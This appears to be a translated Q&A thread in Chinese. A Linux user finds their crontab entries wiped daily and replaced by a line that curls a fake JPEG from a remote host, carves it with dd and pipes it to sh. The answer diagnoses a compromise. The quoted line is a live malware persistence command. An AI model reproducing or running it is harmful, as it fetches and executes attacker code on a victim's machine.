我的 Linux 中的 Crontab 条目每天都被删除。我添加了条目,第二天当我检查我能找到的所有内容时:
*/60 * * * * curl https://ooo.0o0.ooo/2017/01/21/58837a6d11262.jpg -k|dd skip=3458 bs=1|sh
同时 root 用户中的 crontab 条目仍然存在。
下载 shell 脚本(同样以 JPEG 伪装)并运行它的 crontab 条目强烈表明您的系统已被入侵。您应该关闭受影响的计算机并询问您的 IT 团队如何处理它。
(妥协将解释你消失的 crontab 条目——大概你无意中托管的任何恶意软件都会重写 crontab。)
| 归档时间: |
|
| 查看次数: |
1335 次 |
| 最近记录: |